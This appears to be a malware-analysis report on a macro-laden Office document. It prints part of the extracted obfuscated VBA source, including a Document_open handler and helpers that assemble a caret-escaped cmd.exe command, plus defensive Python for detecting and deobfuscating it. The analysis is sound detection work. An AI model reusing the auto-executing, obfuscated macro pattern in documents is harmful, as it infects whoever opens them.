Verdict: MALICIOUS
Risk Score: 162
Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample is an Office document containing VBA macros. The critical heuristic OLE_VBA_SHELL indicates a Shell() call in the VBA code; OLE_VBA_DOCOPEN shows a Document_Open handler, so the code runs as soon as the document is opened with macros enabled, and OLE_VBA_PCODE_AUTOEXEC_EXEC confirms the same pairing of an auto-execution token with shell/download/object-execution tokens in the compiled p-code stream, so the verdict does not rest on the recovered source alone. In the extracted source, Document_open calls Application.Run on a named procedure whose argument is concatenated from dozens of helper results, and the helper bodies that are visible assemble a cmd.exe command line from string fragments: Chr() applied to sums whose only assigned operand is a numeric literal (the other names are unassigned Variants and count as 0), plus caret-escaped keywords such as f^O^r, /^F, %^6 and ^iN that cmd.exe unescapes at run time. This is consistent with a macro designed to execute arbitrary commands, likely to download and run a second-stage payload. No specific family could be identified.
Heuristics (5)

| Heuristic | Severity | ID | Description |
|---|---|---|---|
| VBA macros detected (3 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. |

URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace identifier found in any document with embedded drawing content; it is not a network indicator for this sample.
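A source-level approximation of the pairing that OLE_VBA_DOCOPEN and OLE_VBA_PCODE_AUTOEXEC_EXEC report (an auto-execution entry point together with an execution primitive), added here as an illustration; it is not the analyzer's own code. The token lists are assumptions, and the real heuristic scans the compiled p-code/cache streams rather than recovered source, which is why it still fires when olevba cannot extract any. The positive sample is an abbreviated excerpt of the Document_open handler from the preview below; the negative sample is constructed.

```python
import re

# Token lists are assumptions for this example, not the analyzer's own.
AUTOEXEC_TOKENS = (
    "AutoOpen", "AutoExec", "AutoClose", "Document_Open", "Document_Close",
    "Workbook_Open", "Workbook_Activate",
)
EXEC_TOKENS = (
    "Shell", "WScript.Shell", "Shell.Application", "CreateObject",
    "Application.Run", "URLDownloadToFile", "XMLHTTP", "PowerShell",
)


def _present(tokens, vba):
    # VBA identifiers are case-insensitive (the sample writes Document_open),
    # so match case-insensitively and require non-identifier characters on
    # both sides so that a token is not found inside a longer name.
    return [t for t in tokens
            if re.search(r"(?<![A-Za-z0-9_])" + re.escape(t) + r"(?![A-Za-z0-9_])",
                         vba, re.IGNORECASE)]


def scan_macro(vba):
    """Flag VBA text that pairs an auto-exec entry point with an execution primitive."""
    autoexec = _present(AUTOEXEC_TOKENS, vba)
    execs = _present(EXEC_TOKENS, vba)
    return {"autoexec": autoexec, "exec": execs, "hit": bool(autoexec and execs)}


# Abbreviated excerpt of the Document_open handler from the preview; the
# Application.Run argument is shortened, the original concatenates ~25 names.
SUSPICIOUS = '''Private Sub Document_open()
On Error Resume Next
HwqMinUwi = Application.Run("waifBvXjNYt", "" + fiYaiZMMuVqVq + CVar("c") + CcAHVKFJJ)
End Sub
'''

# Constructed benign handler: auto-exec entry point but no execution primitive.
BENIGN = '''Private Sub Document_Open()
MsgBox "Welcome"
End Sub
'''

if __name__ == "__main__":
    for name, text in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, scan_macro(text))
```

Application.Run is in the execution set on purpose: it is how this sample reaches its payload procedure without naming Shell in the entry point, so a scanner that only looks inside the auto-exec handler would miss it.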
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 38139 bytes | 62d95974b0ef30cba862722dfe8f09cec5e79a2b43b5b88f334725319dc9619b |

Preview: first 1,000 lines of the extracted script. The dump below stops at the point marked "(truncated)". olevba concatenates the source of every module, so the second Attribute VB_Name line marks the start of a second module.
Attribute VB_Name = "AKTuYOFnaV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function dNkEMsRYi()
JWCAO = (53978 * dYPEYO) / 39944 - LwszF
JOYlSQ = (97283 * NRnjdA) / 97977 - PKthhn
hNzNjb = (57688 * FrmLHN) / 52241 - mNNbj
oBiZvU = (49048 * DjLhA) / 62407 - hwMfP
skkSf = (10145 * OGzzU) / 83159 - XuGzc
Pjmwaf = (99508 * kkvasU) / 59495 - SLwlGi
RMCVw = (72362 * MWWoDE) / 33567 - wlnDal
End Function
Function RtBApYPAA()
oPibE = jJJMtY - JUZIw + 7425 * HLBtX * uPkazJ + sXXzc + 97268 / iXQaB + 5519 - PzZbO
aDTZj = OsUaK - qVHEMA + 3676 * oloowc * hjKNQ + SMmiE + 5134 / PjZnua + 70650 - RwkNH
zwAqFW = vklzVY - YmdAuM + 95935 * jKPAQ * TAQiqw + pZGrv + 20626 / SawCV + 28580 - QzCXEo
mEpIiA = sSLFvc - ALMaz + 23199 * AEsIn * GwWbTw + iZmZw + 95366 / GCCLw + 46543 - pNDaCR
qaFFN = jVVicB - MWIwBr + 68847 * LMiBt * DOGmI + Zjjmqz + 58389 / EdYtNF + 7990 - uZCzOI
End Function
Private Sub Document_open()
On Error Resume Next
PjqUW = 31203 - uERnFN + pVRNs / NGRBF - srDzfW * vjOAW - 50820 + zVbjci + 21420 - fqFJf * EIPoPc - EqFmR - 77492 - RbUvm
OOJkN = 68508 - XIqjza + iwRzRD / DAKhl - RLcOV * EXwUwC - 10801 + ZimbQ + 99545 - wuKJWl * KNwDc - XMjcN - 35693 - NfcVv
HwqMinUwi = Application.Run("waifBvXjNYt", "" + fiYaiZMMuVqVq + MGzFviWzLqtBEW + CVar("c") + PlMdhPptzr + QaSbqbHo + CcAHVKFJJ + KAVfVUfCpki + rBCWSYzn + IHjIbviEa + IwuuwYF + wGFwj + XirOfRoCc + SRFlZ + lYELZ + fVHKEVY + uBNYj + jKYFwW + GkqDqrs + ldbRijQA + LswXD + MiolivEi + NfKvWODQhw + WdQkfvK + qQOlbmJhkn + UNjQlqVRSEwv + kWsaujMC)
zdURR = 77940 - LlUpA + nqUCv / XOWVA - FcVRTV * CVSHV - 7578 + dqnKjX + 70521 - FjZdR * nwbITV - LttRz - 44006 - tUizww
bModKw = 44919 - spEiPW + zBhmRw / sjAnOl - aiUDF * PTqLN - 77552 + Bcvsh + 42973 - jzQJSk * THcXkm - SKkaJz - 54404 - KWZdpt
End Sub
Function FrIRcOKk()
OYNTiP = iVmpZA - vzHsYn + 29504 - LpdDu - qYSbt * QcUroi * 14286 + lAKwn / 58600 * aQFzrL
WUlDi = 49871 - HYOGFX + ONpAzv / TwXVT - hhYzc * JmrpCj - 25383 + bDiOK + 79907 - PlsmY * hCWNi - QNaAO - 57459 - ODWXn
vMOodC = 41946 - RLRYXA + mukpu / DVURsd - pwZqn * jTwiv - 52879 + Kwaqh + 39691 - OqTZv * DsqtWl - BtVlb - 69864 - UjpMp
uZWCT = hZwSC - wNYwfS + 28718 - iTKwo - rSmNwQ * YMiAiL * 42558 + vEHmzW / 77156 * WXXwV
XsQPJK = mRvfNE - bjUcTR + 93562 - ADUko - TsNFRm * olHEXl * 58303 + iUAZpm / 38476 * vTDpN
dEvikX = 42527 - wcAuN + ndCLK / SQdpP - FniBHk * zaovPm - 25865 + vvslj + 44375 - jGmBf * JMaFO - SibzUP - 24961 - dzinY
End Function
Attribute VB_Name = "qiUYszUOfP"
Function CcAHVKFJJ()
On Error Resume Next
IiPEo = 59962 + jQPdwf - OIEiG - iiJNdM / 78818 * QEUZmP + 11771 + 8185 / bBKVGE / DhzAYz * zZTsdY / bcqvP
svVFzlwI = CStr(Chr(iiPLQRrUIk + EGiIVkGifWoCXH + 109 + AMjaFEwBmj + WDljaHNSm)) + "d" + " /" + CStr(Chr(lvMqLqMnJvR + ARsAKhWldrIblH + 99 + tDmiiwitN + ZvwUEjpj)) + " f^O^" + "r ; "
JQGJI = hwOYac + vOoaT - VATXc + zzZUZq + (86116 / wXhuOp + 31459 * 33993)
TDwsf = BUwAY + qtdiL - Ibohhp + YhuLi + (89492 / XNDZj + 10104 * 38567)
bTUUiiPpO = " , /" + "^F" + " ," + " ;" + " " + CStr(Chr(MIFusIEDP + lXPrflNCmznZ + 34 + piXErwbSAjuhoq + pzKcoYicZwb)) + " " + " " + "deli" + CStr(Chr(QZijzCdhzX + SXizzzWM + 109 + pPtJRwuf + zvkHLwqnNs)) + "s==8R"
usNuj = 78467 - kdmJB - (33456 * VGhHjH / (16697 - GUhcp / 8767 + GJwIjn))
QrsibA = 15395 - VwREdY - (24868 * LwbmtM / (7938 - LpXcNs / 66089 + fiQPoc))
WDUNbN = "f tok" + "ens=" + " 2 " + CStr(Chr(jUVAAfbBER + kTpolhmU + 34 + KXnblzGj + TPiYoQvPD)) + " , " + "; " + "%^6 " + "; ^" + "iN ; "
ZLjXAR = 65149 - QwmLDi - (7200 * sSlcfh / (55201 - TYwHz / 83951 + PKnTBX))
Xpfwv = 92044 - cvMcvJ - (91638 * SsjSEc / (36749 - zYNXBP / 29507 + PRINn))
jSjwCv = 40615 - ZTUVbR - (9695 * iEPjX / (65525 - lMjJM / 56871 + hCTHC))
pPhBwV = " ; ( ," + " ," + " '" + " ; a" + "^^sS" + "o" + "C
... (truncated)
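A resolver for the string-building pattern seen in CcAHVKFJJ in the preview above, added here as a worked example; it is not code from the report or from the analyzer. It copies three assignments from the preview as constructed input and evaluates them the way VBA does: every name inside Chr(...) is an unassigned Variant, which is Empty and counts as 0 in arithmetic, so only the numeric literal survives (Chr(109) is m, Chr(99) is c, Chr(34) is a double quote); On Error Resume Next merely keeps the macro going if anything else fails. A second function undoes the cmd.exe-level tricks the fragments rely on, caret escapes and comma/semicolon delimiters outside quotes. The order in which the fragments are glued together lives in the truncated part of the preview, so rebuild_command() joins them in the order they are assigned; that order is an assumption for illustration only.

```python
import re

# Three assignments copied from CcAHVKFJJ in the preview above, kept here as
# constructed input. No identifier inside Chr(...) is assigned anywhere in the
# module, so VBA evaluates each one as Empty (0 in arithmetic).
FRAGMENTS = {
    "svVFzlwI": 'CStr(Chr(iiPLQRrUIk + EGiIVkGifWoCXH + 109 + AMjaFEwBmj + WDljaHNSm)) + "d" + " /" + CStr(Chr(lvMqLqMnJvR + ARsAKhWldrIblH + 99 + tDmiiwitN + ZvwUEjpj)) + " f^O^" + "r ; "',
    "bTUUiiPpO": '" , /" + "^F" + " ," + " ;" + " " + CStr(Chr(MIFusIEDP + lXPrflNCmznZ + 34 + piXErwbSAjuhoq + pzKcoYicZwb)) + " " + " " + "deli" + CStr(Chr(QZijzCdhzX + SXizzzWM + 109 + pPtJRwuf + zvkHLwqnNs)) + "s==8R"',
    "WDUNbN": '"f tok" + "ens=" + " 2 " + CStr(Chr(jUVAAfbBER + kTpolhmU + 34 + KXnblzGj + TPiYoQvPD)) + " , " + "; " + "%^6 " + "; ^" + "iN ; "',
}

# A concatenation operand is either a string literal or a CStr(Chr(<sum>)) call.
_OPERAND = re.compile(r'"([^"]*)"|CStr\(Chr\(([^()]*)\)\)')


def resolve_vba_concat(expr):
    """Evaluate a VBA concatenation of literals and CStr(Chr(a + b + ...)) calls.

    Identifiers in the Chr() sum count as 0 (Empty); only numeric literals add
    up. Doubled-quote escapes ("") inside literals are not handled because the
    preview never uses them.
    """
    pieces = []
    for literal, chr_args in _OPERAND.findall(expr):
        if chr_args:
            code = sum(int(t) for t in (s.strip() for s in chr_args.split("+")) if t.isdigit())
            pieces.append(chr(code))
        else:
            pieces.append(literal)
    return "".join(pieces)


def normalize_cmd(cmdline):
    """Undo the cmd.exe-level obfuscation the fragments rely on.

    Outside double quotes cmd treats '^' as an escape for the next character
    (f^O^r is the keyword for, ^^ is a literal caret) and treats ',' ';' and
    whitespace as argument delimiters; inside quotes both are literal. '=' is
    also a delimiter outside quotes but is kept as-is here.
    """
    out = []
    in_quote = False
    i = 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == '"':
            in_quote = not in_quote
            out.append(c)
        elif not in_quote and c == "^" and i + 1 < len(cmdline):
            i += 1
            out.append(cmdline[i])
        elif not in_quote and c in " \t,;":
            if out and out[-1] != " ":
                out.append(" ")
        else:
            out.append(c)
        i += 1
    return "".join(out).strip()


def rebuild_command(order=("svVFzlwI", "bTUUiiPpO", "WDUNbN")):
    """Resolve the fragments, glue them in the given order and normalise.

    The real assembly order is in the truncated part of the preview; the
    default order (order of assignment) is an assumption for illustration.
    """
    return normalize_cmd("".join(resolve_vba_concat(FRAGMENTS[n]) for n in order))


if __name__ == "__main__":
    for name, expr in FRAGMENTS.items():
        print(f"{name} = {resolve_vba_concat(expr)!r}")
    print("assumed assembly:", rebuild_command())
```

Even without the assembly order, the resolved pieces (md /c, f^O^r, /^F, tokens=, delims=, %^6, ^iN) are the skeleton of a cmd.exe for /F loop, which is what the OLE_VBA_SHELL finding is pointing at, and they can be read off statically without ever running the macro. The same resolver applies to the remaining helper functions once the full macros.bas is in hand.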